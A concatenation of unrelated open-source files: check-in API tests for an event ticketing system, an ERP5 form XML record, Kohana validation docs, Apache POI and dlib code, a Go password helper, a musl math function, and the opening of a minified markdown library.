resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {'nonce': 'foobar'}, format='json')
assert resp.status_code == 201
assert resp.data['status'] == 'ok'
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {'nonce': 'foobar'}, format='json')
assert resp.status_code == 201
assert resp.data['status'] == 'ok'
with scopes_disabled():
assert p.checkins.count() == 1
@pytest.mark.django_db
def test_multiple_different_list(token_client, organizer, clist, clist_all, event, order):
with scopes_disabled():
p = order.positions.first()
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {'nonce': 'foobar'}, format='json')
assert resp.status_code == 201
assert resp.data['status'] == 'ok'
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist_all.pk, p.pk
), {'nonce': 'baz'}, format='json')
assert resp.status_code == 201
assert resp.data['status'] == 'ok'
@pytest.mark.django_db
def test_forced_multiple(token_client, organizer, clist, event, order):
with scopes_disabled():
p = order.positions.first()
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {}, format='json')
assert resp.status_code == 201
assert resp.data['status'] == 'ok'
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {'force': True}, format='json')
assert resp.status_code == 201
assert resp.data['status'] == 'ok'
@pytest.mark.django_db
def test_require_product(token_client, organizer, clist, event, order):
with scopes_disabled():
clist.limit_products.clear()
p = order.positions.first()
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {}, format='json')
assert resp.status_code == 400
assert resp.data['status'] == 'error'
assert resp.data['reason'] == 'product'
@pytest.mark.django_db
def test_require_paid(token_client, organizer, clist, event, order):
with scopes_disabled():
p = order.positions.first()
order.status = Order.STATUS_CANCELED
order.save()
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {}, format='json')
assert resp.status_code == 400
assert resp.data['status'] == 'error'
assert resp.data['reason'] == 'unpaid'
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {'canceled_supported': True}, format='json')
assert resp.status_code == 400
assert resp.data['status'] == 'error'
assert resp.data['reason'] == 'canceled'
order.status = Order.STATUS_PENDING
order.save()
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {}, format='json')
assert resp.status_code == 400
assert resp.data['status'] == 'error'
assert resp.data['reason'] == 'unpaid'
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {'ignore_unpaid': True}, format='json')
assert resp.status_code == 400
assert resp.data['status'] == 'error'
assert resp.data['reason'] == 'unpaid'
clist.include_pending = True
clist.save()
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {}, format='json')
assert resp.status_code == 400
assert resp.data['status'] == 'error'
assert resp.data['reason'] == 'unpaid'
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {'ignore_unpaid': True}, format='json')
assert resp.status_code == 201
assert resp.data['status'] == 'ok'
@pytest.fixture
def question(event, item):
q = event.questions.create(question=LazyI18nString('Size'), type='C', required=True, ask_during_checkin=True)
a1 = q.options.create(answer=LazyI18nString("M"))
a2 = q.options.create(answer=LazyI18nString("L"))
q.items.add(item)
return q, a1, a2
@pytest.mark.django_db
def test_question_number(token_client, organizer, clist, event, order, question):
with scopes_disabled():
p = order.positions.first()
question[0].options.all().delete()
question[0].type = 'N'
question[0].save()
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {}, format='json')
assert resp.status_code == 400
assert resp.data['status'] == 'incomplete'
with scopes_disabled():
assert resp.data['questions'] == [QuestionSerializer(question[0]).data]
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {'answers': {question[0].pk: "3.24"}}, format='json')
assert resp.status_code == 201
assert resp.data['status'] == 'ok'
with scopes_disabled():
assert order.positions.first().answers.get(question=question[0]).answer == '3.24'
@pytest.mark.django_db
def test_question_choice(token_client, organizer, clist, event, order, question):
with scopes_disabled():
p = order.positions.first()
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {}, format='json')
assert resp.status_code == 400
assert resp.data['status'] == 'incomplete'
with scopes_disabled():
assert resp.data['questions'] == [QuestionSerializer(question[0]).data]
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {'answers': {question[0].pk: str(question[1].pk)}}, format='json')
assert resp.status_code == 201
assert resp.data['status'] == 'ok'
with scopes_disabled():
assert order.positions.first().answers.get(question=question[0]).answer == 'M'
assert list(order.positions.first().answers.get(question=question[0]).options.all()) == [question[1]]
@pytest.mark.django_db
def test_question_choice_identifier(token_client, organizer, clist, event, order, question):
with scopes_disabled():
p = order.positions.first()
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {}, format='json')
assert resp.status_code == 400
assert resp.data['status'] == 'incomplete'
with scopes_disabled():
assert resp.data['questions'] == [QuestionSerializer(question[0]).data]
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {'answers': {question[0].pk: str(question[1].identifier)}}, format='json')
print(resp.data)
assert resp.status_code == 201
assert resp.data['status'] == 'ok'
with scopes_disabled():
assert order.positions.first().answers.get(question=question[0]).answer == 'M'
assert list(order.positions.first().answers.get(question=question[0]).options.all()) == [question[1]]
@pytest.mark.django_db
def test_question_invalid(token_client, organizer, clist, event, order, question):
with scopes_disabled():
p = order.positions.first()
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {'answers': {question[0].pk: "A"}}, format='json')
assert resp.status_code == 400
assert resp.data['status'] == 'incomplete'
with scopes_disabled():
assert resp.data['questions'] == [QuestionSerializer(question[0]).data]
@pytest.mark.django_db
def test_question_required(token_client, organizer, clist, event, order, question):
with scopes_disabled():
p = order.positions.first()
question[0].required = True
question[0].save()
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {}, format='json')
assert resp.status_code == 400
assert resp.data['status'] == 'incomplete'
with scopes_disabled():
assert resp.data['questions'] == [QuestionSerializer(question[0]).data]
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {'answers': {question[0].pk: ""}}, format='json')
assert resp.status_code == 400
assert resp.data['status'] == 'incomplete'
with scopes_disabled():
assert resp.data['questions'] == [QuestionSerializer(question[0]).data]
@pytest.mark.django_db
def test_question_optional(token_client, organizer, clist, event, order, question):
with scopes_disabled():
p = order.positions.first()
question[0].required = False
question[0].save()
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {}, format='json')
assert resp.status_code == 400
assert resp.data['status'] == 'incomplete'
with scopes_disabled():
assert resp.data['questions'] == [QuestionSerializer(question[0]).data]
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {'answers': {question[0].pk: ""}}, format='json')
assert resp.status_code == 201
assert resp.data['status'] == 'ok'
@pytest.mark.django_db
def test_question_multiple_choice(token_client, organizer, clist, event, order, question):
with scopes_disabled():
p = order.positions.first()
question[0].type = 'M'
question[0].save()
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {}, format='json')
assert resp.status_code == 400
assert resp.data['status'] == 'incomplete'
with scopes_disabled():
assert resp.data['questions'] == [QuestionSerializer(question[0]).data]
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {'answers': {question[0].pk: "{},{}".format(question[1].pk, question[2].pk)}}, format='json')
assert resp.status_code == 201
assert resp.data['status'] == 'ok'
with scopes_disabled():
assert order.positions.first().answers.get(question=question[0]).answer == 'M, L'
assert set(order.positions.first().answers.get(question=question[0]).options.all()) == {question[1], question[2]}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0"?>
<ZopeData>
<record id="1" aka="AAAAAAAAAAE=">
<pickle>
<global name="ProxyField" module="Products.ERP5Form.ProxyField"/>
</pickle>
<pickle>
<dictionary>
<item>
<key> <string>delegated_list</string> </key>
<value>
<list>
<string>title</string>
</list>
</value>
</item>
<item>
<key> <string>id</string> </key>
<value> <string>my_configuration_translation_gadget_url</string> </value>
</item>
<item>
<key> <string>message_values</string> </key>
<value>
<dictionary>
<item>
<key> <string>external_validator_failed</string> </key>
<value> <string>The input failed the external validator.</string> </value>
</item>
</dictionary>
</value>
</item>
<item>
<key> <string>overrides</string> </key>
<value>
<dictionary>
<item>
<key> <string>field_id</string> </key>
<value> <string></string> </value>
</item>
<item>
<key> <string>form_id</string> </key>
<value> <string></string> </value>
</item>
<item>
<key> <string>target</string> </key>
<value> <string></string> </value>
</item>
</dictionary>
</value>
</item>
<item>
<key> <string>tales</string> </key>
<value>
<dictionary>
<item>
<key> <string>field_id</string> </key>
<value> <string></string> </value>
</item>
<item>
<key> <string>form_id</string> </key>
<value> <string></string> </value>
</item>
<item>
<key> <string>target</string> </key>
<value> <string></string> </value>
</item>
</dictionary>
</value>
</item>
<item>
<key> <string>values</string> </key>
<value>
<dictionary>
<item>
<key> <string>field_id</string> </key>
<value> <string>my_view_mode_reference</string> </value>
</item>
<item>
<key> <string>form_id</string> </key>
<value> <string>Base_viewFieldLibrary</string> </value>
</item>
<item>
<key> <string>target</string> </key>
<value> <string>Click to edit the target</string> </value>
</item>
<item>
<key> <string>title</string> </key>
<value> <string>Translation Gadget</string> </value>
</item>
</dictionary>
</value>
</item>
</dictionary>
</pickle>
</record>
</ZopeData>
| {
"pile_set_name": "Github"
} |
# Validation
*This page needs to be reviewed for accuracy by the development team. Better examples would be helpful.*
Validation can be performed on any array using the [Validation] class. Labels and rules can be attached to a Validation object by the array key, called a "field name".
labels
: A label is a human-readable version of the field name.
rules
: A rule is a callback or closure used to decide whether or not to add an error to a field
[!!] Note that any valid [PHP callback](http://php.net/manual/language.pseudo-types.php#language.types.callback) can be used as a rule.
Using `TRUE` as the field name when adding a rule will be applied to all named fields.
Creating a validation object is done using the [Validation::factory] method:
$object = Validation::factory($array);
[!!] The `$object` object will be used for the rest of this tutorial. This tutorial will show you how to validate the registration of a new user.
## Provided Rules
Kohana provides a set of useful rules in the [Valid] class:
Rule name | Function
------------------------- |-------------------------------------------------
[Valid::not_empty] | Value must be a non-empty value
[Valid::regex] | Match the value against a regular expression
[Valid::min_length] | Minimum number of characters for value
[Valid::max_length] | Maximum number of characters for value
[Valid::exact_length] | Value must be an exact number of characters
[Valid::email] | An email address is required
[Valid::email_domain] | Check that the domain of the email exists
[Valid::url] | Value must be a URL
[Valid::ip] | Value must be an IP address
[Valid::phone] | Value must be a phone number
[Valid::credit_card] | Require a credit card number
[Valid::date] | Value must be a date (and time)
[Valid::alpha] | Only alpha characters allowed
[Valid::alpha_dash] | Only alpha and hyphens allowed
[Valid::alpha_numeric] | Only alpha and numbers allowed
[Valid::digit] | Value must be an integer digit
[Valid::decimal] | Value must be a decimal or float value
[Valid::numeric] | Only numeric characters allowed
[Valid::range] | Value must be within a range
[Valid::color] | Value must be a valid HEX color
[Valid::matches] | Value matches another field value
## Adding Rules
All validation rules are defined as a field name, a method, a function (using the [PHP callback](http://php.net/callback) syntax) or [closure](http://php.net/manual/functions.anonymous.php), and an array of parameters:
$object->rule($field, $callback, array($parameter1, $parameter2));
If no parameters are specified, the field value will be passed to the callback. The following two rules are equivalent:
$object->rule($field, 'not_empty');
$object->rule($field, 'not_empty', array(':value'));
Rules defined in the [Valid] class can be added by using the method name alone. The following three rules are equivalent:
$object->rule('number', 'phone');
$object->rule('number', array('Valid', 'phone'));
$object->rule('number', 'Valid::phone');
### Adding Rules for multiple fields together
To validate multiple fields together, you can do something like this:
$object->rule('one', 'only_one', array(':validation', array('one', 'two')));
$object->rule('two', 'only_one', array(':validation', array('one', 'two')));
public function only_one($validation, $fields)
{
// If more than 1 field is set, bail.
$matched = 0;
foreach ($fields as $field)
{
if (isset($validation[$field]))
{
$matched++;
}
}
if ($matched > 0)
{
// Add the error to all concerned fields
foreach ($fields as $field)
{
$validation->error($field, 'only_one');
}
}
}
## Binding Variables
The [Validation] class allows you to bind variables to certain strings so that they can be used when defining rules. Variables are bound by calling the [Validation::bind] method.
$object->bind(':model', $user_model);
// Future code will be able to use :model to reference the object
$object->rule('username', 'some_rule', array(':model'));
By default, the validation object will automatically bind the following values for you to use as rule parameters:
- `:validation` - references the validation object
- `:field` - references the field name the rule is for
- `:value` - references the value of the field the rule is for
## Adding Errors
The [Validation] class will add an error for a field if any of the rules associated to it return `FALSE`. This allows many built in PHP functions to be used as rules, like `in_array`.
$object->rule('color', 'in_array', array(':value', array('red', 'green', 'blue')));
Rules added to empty fields will run, but returning `FALSE` will not automatically add an error for the field. In order for a rule to affect empty fields, you must add the error manually by calling the [Validation::error] method. In order to do this, you must pass the validation object to the rule.
$object->rule($field, 'the_rule', array(':validation', ':field'));
public function the_rule($validation, $field)
{
if (something went wrong)
{
$validation->error($field, 'the_rule');
}
}
[!!] `not_empty` and `matches` are the only rules that will run on empty fields and add errors by returning `FALSE`.
## Example
To start our example, we will perform validation on the HTTP POST data of the current request that contains user registration information:
[!!] In Kohana controllers, we access `$this->request->post()` instead of `$_POST` for better request isolation.
$object = Validation::factory($this->request->post());
Next we need to process the POST'ed information using [Validation]. To start, we need to add some rules:
$object
->rule('username', 'not_empty')
->rule('username', 'regex', array(':value', '/^[a-z_.]++$/iD'))
->rule('password', 'not_empty')
->rule('password', 'min_length', array(':value', '6'))
->rule('confirm', 'matches', array(':validation', 'confirm', 'password'))
->rule('use_ssl', 'not_empty');
Any existing PHP function can also be used a rule. For instance, if we want to check if the user entered a proper value for the SSL question:
$object->rule('use_ssl', 'in_array', array(':value', array('yes', 'no')));
Note that all array parameters must still be wrapped in an array! Without the wrapping array, `in_array` would be called as `in_array($value, 'yes', 'no')`, which would result in a PHP error.
Any custom rules can be added using a [PHP callback](http://php.net/manual/language.pseudo-types.php#language.types.callback]:
$object->rule('username', 'User_Model::unique_username');
The method `User_Model::unique_username()` would be defined similar to:
public static function unique_username($username)
{
// Check if the username already exists in the database
return ! DB::select(array(DB::expr('COUNT(username)'), 'total'))
->from('users')
->where('username', '=', $username)
->execute()
->get('total');
}
[!!] Custom rules allow many additional checks to be reused for multiple purposes. These methods will almost always exist in a model, but may be defined in any class.
# A Complete Example
First, we need a [View] that contains the HTML form, which will be placed in `application/views/user/register.php`:
<?php echo Form::open() ?>
<?php if ($errors): ?>
<p class="message">Some errors were encountered, please check the details you entered.</p>
<ul class="errors">
<?php foreach ($errors as $message): ?>
<li><?php echo $message ?></li>
<?php endforeach ?>
<?php endif ?>
<dl>
<dt><?php echo Form::label('username', 'Username') ?></dt>
<dd><?php echo Form::input('username', $post['username']) ?></dd>
<dt><?php echo Form::label('password', 'Password') ?></dt>
<dd><?php echo Form::password('password') ?></dd>
<dd class="help">Passwords must be at least 6 characters long.</dd>
<dt><?php echo Form::label('confirm', 'Confirm Password') ?></dt>
<dd><?php echo Form::password('confirm') ?></dd>
<dt><?php echo Form::label('use_ssl', 'Use extra security?') ?></dt>
<dd><?php echo Form::select('use_ssl', array('yes' => 'Always', 'no' => 'Only when necessary'), $post['use_ssl']) ?></dd>
<dd class="help">For security, SSL is always used when making payments.</dd>
</dl>
<?php echo Form::submit(NULL, 'Sign Up') ?>
<?php echo Form::close() ?>
[!!] This example uses the [Form] helper extensively. Using [Form] instead of writing HTML ensures that all of the form inputs will properly handle input that includes HTML characters. If you prefer to write the HTML yourself, be sure to use [HTML::chars] to escape user input.
Next, we need a controller and action to process the registration, which will be placed in `application/classes/Controller/User.php`:
class Controller_User extends Controller {
public function action_register()
{
$user = Model::factory('user');
$validation = Validation::factory($this->request->post())
->rule('username', 'not_empty')
->rule('username', 'regex', array(':value', '/^[a-z_.]++$/iD'))
->rule('username', array($user, 'unique_username'))
->rule('password', 'not_empty')
->rule('password', 'min_length', array(':value', 6))
->rule('confirm', 'matches', array(':validation', ':field', 'password'))
->rule('use_ssl', 'not_empty')
->rule('use_ssl', 'in_array', array(':value', array('yes', 'no')));
if ($validation->check())
{
// Data has been validated, register the user
$user->register($this->request->post());
// Always redirect after a successful POST to prevent refresh warnings
$this->redirect('user/profile', 302);
}
// Validation failed, collect the errors
$errors = $validation->errors('user');
// Display the registration form
$this->response->body(View::factory('user/register'))
->bind('post', $this->request->post())
->bind('errors', $errors);
}
}
We will also need a user model, which will be placed in `application/classes/Model/User.php`:
class Model_User extends Model {
public function register($array)
{
// Create a new user record in the database
$id = DB::insert(array_keys($array))
->values($array)
->execute();
// Save the new user id to a cookie
cookie::set('user', $id);
return $id;
}
}
That is it, we have a complete user registration example that properly checks user input!
| {
"pile_set_name": "Github"
} |
/* ====================================================================
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==================================================================== */
package org.apache.poi.hwmf;
import static org.apache.poi.POITestCase.assertContains;
import static org.junit.Assert.assertEquals;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.nio.charset.Charset;
import java.nio.charset.StandardCharsets;
import java.util.List;
import org.apache.poi.POIDataSamples;
import org.apache.poi.hwmf.record.HwmfFont;
import org.apache.poi.hwmf.record.HwmfRecord;
import org.apache.poi.hwmf.record.HwmfRecordType;
import org.apache.poi.hwmf.record.HwmfText;
import org.apache.poi.hwmf.usermodel.HwmfPicture;
import org.apache.poi.util.LocaleUtil;
import org.apache.poi.util.RecordFormatException;
import org.junit.Ignore;
import org.junit.Test;
public class TestHwmfParsing {
private static final POIDataSamples samples = POIDataSamples.getSlideShowInstance();
// ******************************************************************************
// for manual mass parsing and rendering tests of .wmfs use HemfPictureTest.paint() !
// ******************************************************************************
@Test
public void parse() throws IOException {
try (InputStream fis = samples.openResourceAsStream("santa.wmf")) {
HwmfPicture wmf = new HwmfPicture(fis);
List<HwmfRecord> records = wmf.getRecords();
assertEquals(581, records.size());
}
}
@Test(expected = RecordFormatException.class)
public void testInfiniteLoop() throws Exception {
try (InputStream is = samples.openResourceAsStream("61338.wmf")) {
new HwmfPicture(is);
}
}
@Test
@Ignore("If we decide we can use common crawl file specified, we can turn this back on")
public void testCyrillic() throws Exception {
//TODO: move test file to framework and fix this
File dir = new File("C:/somethingOrOther");
File f = new File(dir, "ZMLH54SPLI76NQ7XMKVB7SMUJA2HTXTS-2.wmf");
HwmfPicture wmf = new HwmfPicture(new FileInputStream(f));
Charset charset = LocaleUtil.CHARSET_1252;
StringBuilder sb = new StringBuilder();
//this is pure hackery for specifying the font
//this happens to work on this test file, but you need to
//do what Graphics does by maintaining the stack, etc.!
for (HwmfRecord r : wmf.getRecords()) {
if (r.getWmfRecordType().equals(HwmfRecordType.createFontIndirect)) {
HwmfFont font = ((HwmfText.WmfCreateFontIndirect)r).getFont();
charset = (font.getCharset().getCharset() == null) ? LocaleUtil.CHARSET_1252 : font.getCharset().getCharset();
}
if (r.getWmfRecordType().equals(HwmfRecordType.extTextOut)) {
HwmfText.WmfExtTextOut textOut = (HwmfText.WmfExtTextOut)r;
sb.append(textOut.getText(charset)).append("\n");
}
}
String txt = sb.toString();
assertContains(txt, "\u041E\u0431\u0449\u043E");
assertContains(txt, "\u0411\u0430\u043B\u0430\u043D\u0441");
}
@Test
public void testShift_JIS() throws Exception {
//this file derives from common crawl: see Bug 60677
HwmfPicture wmf = null;
try (InputStream fis = samples.openResourceAsStream("60677.wmf")) {
wmf = new HwmfPicture(fis);
}
Charset charset = LocaleUtil.CHARSET_1252;
StringBuilder sb = new StringBuilder();
//this is pure hackery for specifying the font
//this happens to work on this test file, but you need to
//do what Graphics does by maintaining the stack, etc.!
for (HwmfRecord r : wmf.getRecords()) {
if (r.getWmfRecordType().equals(HwmfRecordType.createFontIndirect)) {
HwmfFont font = ((HwmfText.WmfCreateFontIndirect)r).getFont();
charset = (font.getCharset().getCharset() == null) ? LocaleUtil.CHARSET_1252 : font.getCharset().getCharset();
}
if (r.getWmfRecordType().equals(HwmfRecordType.extTextOut)) {
HwmfText.WmfExtTextOut textOut = (HwmfText.WmfExtTextOut)r;
sb.append(textOut.getText(charset)).append("\n");
}
}
String txt = sb.toString();
assertContains(txt, "\u822A\u7A7A\u60C5\u5831\u696D\u52D9\u3078\u306E\uFF27\uFF29\uFF33");
}
@Test
public void testLengths() throws Exception {
//both substring and length rely on char, not codepoints.
//This test confirms that the substring calls in HwmfText
//will not truncate even beyond-bmp data.
//The last character (Deseret AY U+1040C) is comprised of 2 utf16 surrogates/codepoints
String s = "\u666E\u6797\u65AF\uD801\uDC0C";
Charset utf16LE = StandardCharsets.UTF_16LE;
byte[] bytes = s.getBytes(utf16LE);
String rebuilt = new String(bytes, utf16LE);
rebuilt = rebuilt.substring(0, Math.min(bytes.length, rebuilt.length()));
assertEquals(s, rebuilt);
assertEquals(5, rebuilt.length());
long cnt = rebuilt.codePoints().count();
assertEquals(4, cnt);
}
}
| {
"pile_set_name": "Github"
} |
// Copyright (C) 2013 Davis E. King ([email protected])
// License: Boost Software License See LICENSE.txt for the full license.
#undef DLIB_STRUCTURAL_SEQUENCE_sEGMENTATION_TRAINER_ABSTRACT_Hh_
#ifdef DLIB_STRUCTURAL_SEQUENCE_sEGMENTATION_TRAINER_ABSTRACT_Hh_
#include "sequence_segmenter_abstract.h"
namespace dlib
{
// ----------------------------------------------------------------------------------------
template <
typename feature_extractor
>
class structural_sequence_segmentation_trainer
{
/*!
REQUIREMENTS ON feature_extractor
It must be an object that implements an interface compatible with
the example_feature_extractor defined in dlib/svm/sequence_segmenter_abstract.h.
WHAT THIS OBJECT REPRESENTS
This object is a tool for learning to do sequence segmentation based on a
set of training data. The training procedure produces a sequence_segmenter
object which can be used to identify the sub-segments of new data
sequences.
This object internally uses the structural_sequence_labeling_trainer to
solve the learning problem.
!*/
public:
typedef typename feature_extractor::sequence_type sample_sequence_type;
typedef std::vector<std::pair<unsigned long, unsigned long> > segmented_sequence_type;
typedef sequence_segmenter<feature_extractor> trained_function_type;
structural_sequence_segmentation_trainer (
);
/*!
ensures
- #get_c() == 100
- this object isn't verbose
- #get_epsilon() == 0.1
- #get_num_threads() == 2
- #get_max_cache_size() == 40
- #get_feature_extractor() == a default initialized feature_extractor
- #get_loss_per_missed_segment() == 1
- #get_loss_per_false_alarm() == 1
!*/
explicit structural_sequence_segmentation_trainer (
const feature_extractor& fe
);
/*!
ensures
- #get_c() == 100
- this object isn't verbose
- #get_epsilon() == 0.1
- #get_num_threads() == 2
- #get_max_cache_size() == 40
- #get_feature_extractor() == fe
- #get_loss_per_missed_segment() == 1
- #get_loss_per_false_alarm() == 1
!*/
const feature_extractor& get_feature_extractor (
) const;
/*!
ensures
- returns the feature extractor used by this object
!*/
void set_num_threads (
unsigned long num
);
/*!
ensures
- #get_num_threads() == num
!*/
unsigned long get_num_threads (
) const;
/*!
ensures
- returns the number of threads used during training. You should
usually set this equal to the number of processing cores on your
machine.
!*/
void set_epsilon (
double eps_
);
/*!
requires
- eps > 0
ensures
- #get_epsilon() == eps
!*/
double get_epsilon (
) const;
/*!
ensures
- returns the error epsilon that determines when training should stop.
Smaller values may result in a more accurate solution but take longer
to train. You can think of this epsilon value as saying "solve the
optimization problem until the average number of segmentation mistakes
per training sample is within epsilon of its optimal value".
!*/
void set_max_cache_size (
unsigned long max_size
);
/*!
ensures
- #get_max_cache_size() == max_size
!*/
unsigned long get_max_cache_size (
) const;
/*!
ensures
- During training, this object basically runs the sequence_segmenter on
each training sample, over and over. To speed this up, it is possible to
cache the results of these segmenter invocations. This function returns
the number of cache elements per training sample kept in the cache. Note
that a value of 0 means caching is not used at all.
!*/
void be_verbose (
);
/*!
ensures
- This object will print status messages to standard out so that a user can
observe the progress of the algorithm.
!*/
void be_quiet (
);
/*!
ensures
- this object will not print anything to standard out
!*/
void set_oca (
const oca& item
);
/*!
ensures
- #get_oca() == item
!*/
const oca get_oca (
) const;
/*!
ensures
- returns a copy of the optimizer used to solve the structural SVM problem.
!*/
void set_c (
double C
);
/*!
requires
- C > 0
ensures
- #get_c() = C
!*/
double get_c (
) const;
/*!
ensures
- returns the SVM regularization parameter. It is the parameter that
determines the trade-off between trying to fit the training data (i.e.
minimize the loss) or allowing more errors but hopefully improving the
generalization of the resulting sequence labeler. Larger values
encourage exact fitting while smaller values of C may encourage better
generalization.
!*/
void set_loss_per_missed_segment (
double loss
);
/*!
requires
- loss >= 0
ensures
- #get_loss_per_missed_segment() == loss
!*/
double get_loss_per_missed_segment (
) const;
/*!
ensures
- returns the amount of loss incurred for failing to detect a segment. The
larger the loss the more important it is to detect all the segments.
!*/
void set_loss_per_false_alarm (
double loss
);
/*!
requires
- loss >= 0
ensures
- #get_loss_per_false_alarm() == loss
!*/
double get_loss_per_false_alarm (
) const;
/*!
ensures
- returns the amount of loss incurred for outputting a false detection. The
larger the loss the more important it is to avoid outputting false
detections.
!*/
const sequence_segmenter<feature_extractor> train(
const std::vector<sample_sequence_type>& x,
const std::vector<segmented_sequence_type>& y
) const;
/*!
requires
- is_sequence_segmentation_problem(x, y) == true
ensures
- Uses the given training data to learn to do sequence segmentation. That
is, this function will try to find a sequence_segmenter capable of
predicting y[i] when given x[i] as input. Moreover, it should also be
capable of predicting the segmentation of new input sequences. Or in
other words, the learned sequence_segmenter should also generalize to new
data outside the training dataset.
!*/
};
// ----------------------------------------------------------------------------------------
}
#endif // DLIB_STRUCTURAL_SEQUENCE_sEGMENTATION_TRAINER_ABSTRACT_Hh_
| {
"pile_set_name": "Github"
} |
package lea
// 对比密码是否一致
// 因为之前密码是用md5加密的, 所以通过密码长度来判断
// rawPwd 原始, 用户输入的密码
func ComparePwd(rawPwd, dbPwd string) bool {
if len(dbPwd) == 32 {
return Md5(rawPwd) == dbPwd
}
hex := []byte(dbPwd)
return CompareHash(hex, rawPwd)
}
// 加密
func GenPwd(rawPwd string) string {
digest, err := GenerateHash(rawPwd)
if err != nil {
return ""
}
return string(digest)
}
| {
"pile_set_name": "Github"
} |
#include "complex_impl.h"
float complex casinhf(float complex z)
{
z = casinf(CMPLXF(-cimagf(z), crealf(z)));
return CMPLXF(cimagf(z), -crealf(z));
}
| {
"pile_set_name": "Github"
} |
/**
* StrapDown.js - an on-the-fly markdown parser
* Copyright (C) 2014, Lilian Besson. (GPLv3 Licensed)
* https://lbesson.bitbucket.org/md/
* Version: 0.4.1
*/
/**
* marked - a markdown parser
* Copyright (c) 2011-2013, Christopher Jeffrey. (MIT Licensed)
* https://github.com/chjj/marked
*/
;(function(){var block={newline:/^\n+/,code:/^( {4}[^\n]+\n*)+/,fences:noop,hr:/^( *[-*_]){3,} *(?:\n+|$)/,heading:/^ *(#{1,6}) *([^\n]+?) *#* *(?:\n+|$)/,nptable:noop,lheading:/^([^\n]+)\n *(=|-){3,} *\n*/,blockquote:/^( *>[^\n]+(\n[^\n]+)*\n*)+/,list:/^( *)(bull) [\s\S]+?(?:hr|\n{2,}(?! )(?!\1bull )\n*|\s*$)/,html:/^ *(?:comment|closed|closing) *(?:\n{2,}|\s*$)/,def:/^ *\[([^\]]+)\]: *<?([^\s>]+)>?(?: +["(]([^\n]+)[")])? *(?:\n+|$)/,table:noop,paragraph:/^((?:[^\n]+\n?(?!hr|heading|lheading|blockquote|tag|def))+)\n*/,text:/^[^\n]+/};block.bullet=/(?:[*+-]|\d+\.)/;block.item=/^( *)(bull) [^\n]*(?:\n(?!\1bull )[^\n]*)*/;block.item=replace(block.item,'gm')
(/bull/g,block.bullet)
();block.list=replace(block.list)
(/bull/g,block.bullet)
